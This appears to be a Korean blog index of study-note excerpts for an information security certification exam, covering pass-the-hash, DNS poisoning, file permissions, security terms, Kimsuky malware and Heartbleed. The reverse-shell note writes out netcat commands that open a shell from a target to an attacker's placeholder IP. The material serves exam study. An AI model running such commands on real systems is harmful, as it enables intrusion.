Tech/정보보안 요약노트17 정보보안기사 실기 출제기준 1. 정보보안 실무 1.1 시스템 및 네트워크 보안 특성 파악 세부항목 세세항목 1. 운영체제별 보안특성 파악하기 1. IT환경을 구성하고 있는 개인용 단말시스템 또는 서버에 설치된 운영체제환경 및 특징을 파악할 수 있다. 2. 서비스별 운영체제 및 버전을 파악할수 있다. 3. 운영체제별 식별 및 인증, 접근통제, 보안업데이트 등 보안강화 방안을 파악할 수 있다. 4. 운영체제에서 생성되는 로그파일관리가되고 있는지 점검할 수 있다. 2. 프로토콜별 보안특성파악하기 1. OSI 7계층과 TCP/IP 프로토콜의 구성 그리고 각 계층별 기능, 동작 구조를 이해할 수 있다. 2. TCP/IP 각 계층에서 처리하는 PDU 구조 및PDU 헤더별 필드 기능을 이해할 수 있다. 3. IP, ARP, RARP, ICMP.. 2023. 4. 4. 정보보안기사 실기시험 문제 분석 17회 정보보안기사 실기시험 문제 분석 [단답형] 1. mimikaz 와 같은 툴로 메모리에 저장된 NTLM, LanMan 해시를 탈취하여 원격 서버 인증을 시도하는 공격 기법명을 기술하시오. (답) pass the hash * 시중 수험서에 없는 내용으로, 정답을 맞힌 분이 거의 없을 거라 예상됩니다. * 참고 : https://two2sh.tistory.com/m/16 https://blog.naver.com/noorol/221243953797 2. DNS의 캐시 정보를 조작하여 가짜 사이트로 접속을 유도하는 공격 기법명을 기술하시오. (답) DNS 캐시 포이즈닝 * 점수를 주기 위한 문제이므로 반드시 맞춰야 합니다. 3. 사이버 공격의 흐름을 분류하는 기준으로 사이버 킬 체인의 7단계를 확장.. 2022. 8. 9. 단답형 문제 유형 ▶chmod 777 test.sh (owner, group, other 에 rwx 권한 부여) ▶chmod g-w test.sh (group에서 write 권한 제거) ▶chmod g+w, o-x, test.sh (group에 write 권한 추가, other에서 실행 권한 제거) ▶umask 022 설정 시 파일은 666 - 022 = 644 권한이 부여됩니다. ▶umask 022 설정 시 디렉토리는 777 - 022 = 755 권한이 부여됩니다. ※ 즉, 파일과 디렉토리는 기준이 되는 full 권한에 차이가 있습니다. ※ 위와 같이 umask 설정후에 생성되는 파일 및 디렉토리는 기본적으로 644, 755 권한이 자동으로 부여됩니다. 단답형 1) “접속기록”이란 개인정보취급자 등이 (A)에 접속한 .. 2022. 8. 9. 보안 용어 1) SOAR(Security Orchestration, Automation & Response) ▶ 자동화된 분석 및 대응 환경을 형성해 데이터 분석의 정확도를 높이고 탐지 대응 시간을 단축시킬 수 있습니다. 보안 관제를 맡는 전문가의 업무 생산성을 향상시키는 핵심 기술로 떠오르고 있습니다. 2) EDR(Endpoint Detection & Response) ▶ Endpoint에서 행위 기반으로 시스템을 탐지하고 대응하는 기술입니다. 분석 및 이상 탐지, 악성코드 제거, 데이터 및 시스템에서 멀웨어 검색, 기기 손상 시 경고 기능 등을 가지고 있습니다. 3) FIDO(Fast Identity Online) ▶ 온라인 환경에서 편리하고 신속하게 생체 인증 적용이 가능하도록 FIDO 얼라이언스에서 .. 2022. 8. 9. 리버스 VNC 악성코드 ( TightVNC ) 가상 네트워크 컴퓨팅(Virtual Network Computing: VNC)은 원격으로 다른 컴퓨터를 제어하는 화면 제어 시스템을 일컫는다. 일반적으로 사용되는 원격 데스크탑 프로토콜(Remote Desktop Protocol: RDP)과 같이 원격으로 다른 시스템에 접속해 제어하기 위한 목적으로 사용된다. ASEC 분석팀은 최근 해킹그룹 ‘김수키(Kimsuky)’ 관련 악성코드를 모니터링 하던 중 애플시드(AppleSeed) 원격제어 악성코드에 의해 VNC 악성코드가 설치되는 정황을 포착했다. VNC 악성코드의 종류와 공격 방법에 대해 알아본다. 해킹그룹 ‘김수키(Kimsuky)’는 최초 침투 과정을 거쳐 공격 대상 시스템에 ‘애플시드(AppleSeed)’ 백도어를 설치한다. 이어서, 애플시드를 통해.. 2022. 3. 4. 정보보안기사 ( 블로그 ) # 즐겨찾는 이웃들 ~ https://blog.naver.com/hanlok0713/222215557801 정보보안기사 필기 실기 쉽게 공부하자고요. 전자책 구매한 분들은 꼭 읽어 보세요. 전자책 내용을 이해한 분들이라면 어떤 시험이든 합격할 수 있습니다. 그만큼 시험에서는 학습전략이 중요... blog.naver.com https://kmong.com/gig/265513 정보보안기사, 한번에 합격할 수 있도록 가이드해 드립니다. | 33000원부터 시작 가능한 총 평점 4. 153개 총 작업 개수 완료한 총 평점 4.9점인 녹휘의 취업·투잡, 전자책·노하우, 취업∙이직 서비스를 68개의 리뷰와 함께 확인해 보세요. 취업·투잡, 전자책·노하우, 취업∙이직 제공 등 33000원부 kmong.com http.. 2021. 7. 13. 리버스 쉘 ( Revers Shell ) 1. 개요 1)내부침입, 무작위대입, 사전공격등으로 관리자(root)계정 탈취 2)반복적 침입을 위해 일반사용자로 위장한 관리자 계정 생성 3)지속적으로 원격 접속을 통하여 악의적 행위 수행 2. 공격기법 1)외부망에서 telnet , SSH 접속불가 2)방화벽 정책에 따라 Inbound 80,443/tcp만 허용 # netcat 프로그램 방화벽 우회 * 공격자 (123.0.0.1) * 공격대상 (234.0.0.1) 1) 공격자 --> ssh 234.0.0.1 ( 방화벽 차단 ) 2) nc -lvp 80 (공격자 포트 리슨상태) 3) 공격대상 서버( nc 123.0.0.1:80 -e /bin/bash // 내부에서 외부로 접속요청 ) 4) 접속성공 ( //방화벽에서 Outbound 80 오픈상태 ) **.. 2020. 11. 23. SSL/TLS Heart Bleed 1. 개요 1)Open SSL 라이브러리의 하트비트(Heart Beat)확장 모듈 취약점 활용 2)SSL 연결을 매번 재협상하지 않기 위해 상호간 연결 지속신호를 교환(Heart Beat) 3)클라이언트가 Payload 내용과 Payload 길이를 보내면 서버가 응답메세지를 전송 4)서버가 클라이언트의 요청 Payload 내용의 길이를 검증하지 않는 취약점 존재 5)서버의 시스템 메모리 정보가 유출될 수 있는 문제점 존재 2. 공격기법 1)공격자는 짧은 Payload 내용을 최대 Payload 길이 (64KB)로 조작하여 SSL서버로 전송 ex) Heart Beat : |'AB'|64KB| (최대) 2)취약한 버전의 SSL서버는 요청된 하트비트의 최대 Payload길이(64KB)만큼 자신의 시스템 메모리.. 2020. 11. 23. 이전 1 2 3 다음
